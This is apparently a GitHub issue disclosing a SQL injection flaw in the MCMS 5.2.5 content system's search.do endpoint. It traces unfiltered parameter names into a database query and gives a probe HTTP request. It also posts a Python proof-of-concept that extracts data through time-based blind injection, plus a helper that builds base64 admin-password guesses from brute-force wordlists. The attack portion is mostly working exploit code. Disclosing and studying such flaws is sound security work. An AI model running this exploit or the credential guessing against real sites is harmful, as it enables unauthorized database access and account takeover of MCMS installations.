ming-soft/MCMS

MCMS5.2.5 net/mingsoft/cms/action/web/MCmsAction.java SQLI

aw220 opened this issue · 1 comments

aw220 commented

As you can see, the injection was successful, and the next step is to save the post package and put it into sqlmap to run
image

Look up for filed and find the incoming parameter
image

Since the parameter names are directly spliced with strings without filtering, then there may be a loophole, so let's move on to the next data chain
image
image

Since the parameter names are directly spliced with strings without filtering, then there may be a loophole, so let's move on to the next data chain
image
image

This block was found to have database calls
image

Next we try to inject, see the file net/mingsoft/cms/action/web/MCmsAction.java at the top of the class definition, you can know the route is host:port/mcms, and then add the method to be called, you can get the route is host:port/mcms/ search.do, next try to inject

GET /mcms/search.do?1'=0000 HTTP/1.1
User-Agent: PostmanRuntime/7.29.0
Accept: */*
Postman-Token: 315bc447-c977-4eb8-8b99-ae231e7a2b08
Host: localhost:8080
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=96B0978724C81C34A99F09541FA893D4

image

Next I wrote a py file for convenient validation, using delayed injection

"""
{0}:要查的东西
{1}:起始位置
{2}:长度
{3}:猜测的值
"""
host = "http://localhost:8080/mcms/search.do?'%2b(select+'123'+AND+if(ascii(substr({0},{1},{2}))%3d{3},sleep(2),2)),--+=000"

def a():
    with open("/Users/helu/penetration/bruteDicts/account/top500_username.txt", "r") as usernames:
        with open("/Users/helu/penetration/bruteDicts/account/pwdFast.txt", "r") as pwds:
            with open("/Users/helu/penetration/bruteDicts/account/admin_pwd.txt", "a+") as file:
                data1 = usernames.read().splitlines()
                data2 = pwds.read().splitlines()
                for username in data1:
                    for pwd in data2:
                        str = base64.encodebytes(("admin" + ":" + pwd).encode("utf-8"))

                        # str += "\n"
                        file.write(str.decode("utf-8"))

def timeout(url):
    try:
        rsp = requests.get(url, timeout=3)
        return rsp.text
    except Exception:
        return "timeout"


def guess_length(target):
    for i in range(1, 100):
        url = host.format(target,1,1,i)
        rsp = timeout(url)
        if "timeout" in rsp:
            print("库长:" + chr(i) )
            return int(chr(i))

def guess_char(tar,len):
    for i in range(0,len+1):
        for j in range(47, 123):
            url = host.format(tar,i,1,"'{0}'".format(j))
            rsp = timeout(url)
            if "timeout" in rsp:
                print(chr(j))

def b(tar):
    length = guess_length(tar)
    guess_char("database()",length)

b("length(database())")
aboutZZ commented

好家伙,远程执行代码漏洞。快俩月过去了,没一个人回复。